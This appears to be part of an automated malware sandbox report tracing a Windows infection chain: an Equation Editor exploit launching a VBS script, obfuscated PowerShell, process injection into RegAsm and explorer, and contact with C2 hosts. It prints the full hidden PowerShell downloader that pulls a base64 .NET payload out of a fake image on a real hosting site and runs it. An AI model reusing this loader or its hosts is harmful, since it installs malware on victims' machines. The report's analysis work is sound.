            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
            Source: explorer.exe, 0000000E.00000000.472866046.0000000007916000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: powershell.exe, 0000000C.00000002.461353558.00000000020F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 7]8`qemUI
            Source: explorer.exe, 0000000E.00000000.472316615.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 0000000E.00000000.472316615.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
            Source: explorer.exe, 0000000E.00000002.618932135.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
            Source: explorer.exe, 0000000E.00000000.472866046.0000000007916000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0!,
            Source: explorer.exe, 0000000E.00000000.472316615.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,22_2_00081E4C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000E9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,18_2_000E9247
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081000 GetProcessHeap,RtlAllocateHeap,18_2_00081000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: rugtucw.14.drJump to dropped file
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3404, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Windows\explorer.exe EIP: 26E1960Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3864 base: 49102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3892 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3908 base: 49102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3960 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3976 base: 49102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 4068 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3088 base: 49102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3080 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 49102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 49102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 49102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 49102DJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe29_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe29_2_000810A5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucwJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.gbr/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))} }"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgt